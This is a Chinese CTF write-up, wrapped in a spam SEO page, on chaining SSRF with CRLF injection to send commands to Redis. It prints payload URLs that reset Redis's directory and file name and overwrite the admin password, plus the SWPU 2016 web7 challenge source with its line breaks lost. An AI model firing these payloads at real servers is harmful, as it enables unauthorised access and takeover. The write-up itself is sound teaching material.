当前位置: 首页 > news >正文

北京网站建设 知乎安卓优化大师下载安装

news 2025/7/17 3:03:15
北京网站建设 知乎,安卓优化大师下载安装,手工活接单在家做有正规网站吗,做美女网站流量文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞,结合CRLF注入 我们以redis数据库为例,当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%…

文章目录

    • 注入原理
    • 例题 [SWPU 2016]web7

注入原理

参考文章

应用场景是具有SSRF漏洞,结合CRLF注入
我们以redis数据库为例,当存在SSRF时我们伪造以下请求

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0a:6379/foo

解码一下,执行过程就是将修改Redis的工作目录为 /tmp,然后修改Redis的数据库文件名为 evil,路径为默认端口的/foo

http://127.0.0.1
CONFIG SET dir /tmp
CONFIG SET dbfilename evil
:6379/foo

然后就可以执行相关操作,比如修改用户的密码
再次利用ssrf漏洞进行修改并保存

http://127.0.0.1%0d%0aset%20admin%20admin%0d%0asave%0d%0a:6379/foo

解码结果如下

http://127.0.0.1
set admin 123456
save
:6379/foo

例题 [SWPU 2016]web7

源码

#!/usr/bin/python 
# coding:utf8__author__ = 'niexinming'import cherrypy
import urllib2
import redisclass web7:@cherrypy.exposedef index(self):return "<script> window.location.href='/input';</script>"@cherrypy.exposedef input(self,url="",submit=""):file=open("index.html","r").read()reheaders=""if cherrypy.request.method=="GET":reheaders=""else:url=cherrypy.request.params["url"]submit=cherrypy.request.params["submit"]try:for x in urllib2.urlopen(url).info().headers:reheaders=reheaders+x+"<br>"except Exception,e:reheaders="错误"+str(e)for x in urllib2.urlopen(url).info().headers:reheaders=reheaders+x+"<br>"file=file.replace("<?response?>",reheaders)return file@cherrypy.exposedef login(self,password="",submit=""):pool = redis.ConnectionPool(host='127.0.0.1', port=6379)r = redis.Redis(connection_pool=pool)re=""file=open("login.html","r").read()if cherrypy.request.method=="GET":re=""else:password=cherrypy.request.params["password"]submit=cherrypy.request.params["submit"]if r.get("admin")==password:re=open("flag",'r').readline()else:re="Can't find admin:"+password+",fast fast fast....."file=file.replace("<?response?>",re)return file
cherrypy.config.update({'server.socket_host': '0.0.0.0','server.socket_port': 8080,})
cherrypy.quickstart(web7(),'/')

可以看到引入urllib2模块,题目逻辑比较清晰,就是要登录admin才能获取flag,admin的密码就在redis数据库中,然后input中使用了urllib2.open().info().headers应该是可以利用SSRF来注入redis修改admin的密码的。

我们直接修改密码(redis默认端口为6379)

http://127.0.0.1%0d%0aset%20admin%20123456%0d%0a:6379//解码如下
http://127.0.0.1
set admin 123456
:6379

在这里插入图片描述

http://www.dt0577.cn/news/38700.html

相关文章:

  • vs怎么建手机网站网站是怎么做的
  • 微信公众号小程序怎么创建河南纯手工seo
  • 如何进行电商网站设计开发友链之家
  • 做兼职的网站有哪些工作内容青岛百度快速排名优化
  • 做动态网站用哪个程序软件比较简单?湖南长沙疫情最新情况
  • 网页源码下载网页seo
  • 没有网站怎么做推广网络营销的八种方式
  • 重庆网站制作教程百度网站下载
  • 上海建企业网站软文营销文章500字
  • 兰溪网站建设河南网络推广公司
  • 巫山做网站那家好seo技巧分享
  • 初中信息科技怎么自己做网站手机百度浏览器
  • 可以做幻灯片的网站网站建设策划书范文
  • 门户网站app领硕网站seo优化
  • 网站建设项目背景网站建设制作费用
  • 做公司网站客户群体怎么找深圳网络营销信息推荐
  • 在百度上做网站有用吗网络营销步骤
  • 国外企业建站武汉网络推广广告公司
  • 网站升级改版的目的文大侠seo博客
  • 网站诚信认证电话销售广告联盟app推广
  • 邯郸招聘网seo诊断的网络问题
  • 钓鱼网站盗号下载搜索引擎网络排名
  • 网站模版带后台网站专业术语中seo意思是
  • 河南中国建设银行官网站中国企业培训网
  • 做网站需要画原型图么广告精准推广平台
  • 北京app开发流程百度seo教程
  • 深圳平面设计深圳平面设计公司网站优化策略分析
  • 联谊会总结网站建设对外宣传网站整站优化
  • 建行移动门户网站首页太原免费网站建站模板
  • 网站服务器崩溃腾讯企业qq官网